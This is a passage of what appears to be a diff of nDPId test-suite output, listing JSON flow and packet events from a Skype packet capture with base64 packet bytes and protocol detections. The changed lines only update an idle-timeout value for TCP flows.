-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA749YAAEARS6HAqAEi1cezqDLdnEYAJ90VnCwCpNRKktf4Qi\/bdq+yPcZvRHBM0A5YqXcB1iPXfA=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -454,12 +454,12 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2EcMAAEAR7TnAqAEib91KEzLdnEEAItfhnD4Cb3aeHJFamREFARmu+jDLOabt8VoC3Pk="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVldAAEAGAsbAqAEinTeCmcOGnEV7WkqhAAAAALAC\/\/\/tSQAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVldAAEAGAsbAqAEinTeCmcOGnEV7WkqhAAAAALAC\/\/\/tSQAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XMQAAEARBHrAqAEiQAQXrTLdnFEAIKzLnEACNoZuauEq3ADhWmqb7oTzdlIdyJ9N"} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -469,32 +469,32 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA180cAAEARCDTAqAEib91NlTLdnF4AIdImnEQCEhW3FidGQ7GJtk\/GLqF7d8vgcOXTwQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1431969673591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06I5AAEAGuqHAqAEinTc4ksOFnF5LaK4RT0twj4AQECy0NwAAAQEICj4jBMFNhXEj"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1431969673741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673741,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIpxew4ef2YLStJoE9qASOJBoyQAAAgQFrAQCCApNhV7NPiMELQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1431969673591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06I5AAEAGuqHAqAEinTc4ksOFnF5LaK4RT0twj4AQECy0NwAAAQEICj4jBMFNhXEj"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1431969673741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673741,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIpxew4ef2YLStJoE9qASOJBoyQAAAgQFrAQCCApNhV7NPiMELQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxa4AAEAR02nAqAEinTeCkjLdnFoALfPInEYCTMX9D0zWqHZlar9rRJ4nLA7eV\/fFhp0UOFHwVjJRpWMfLA=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 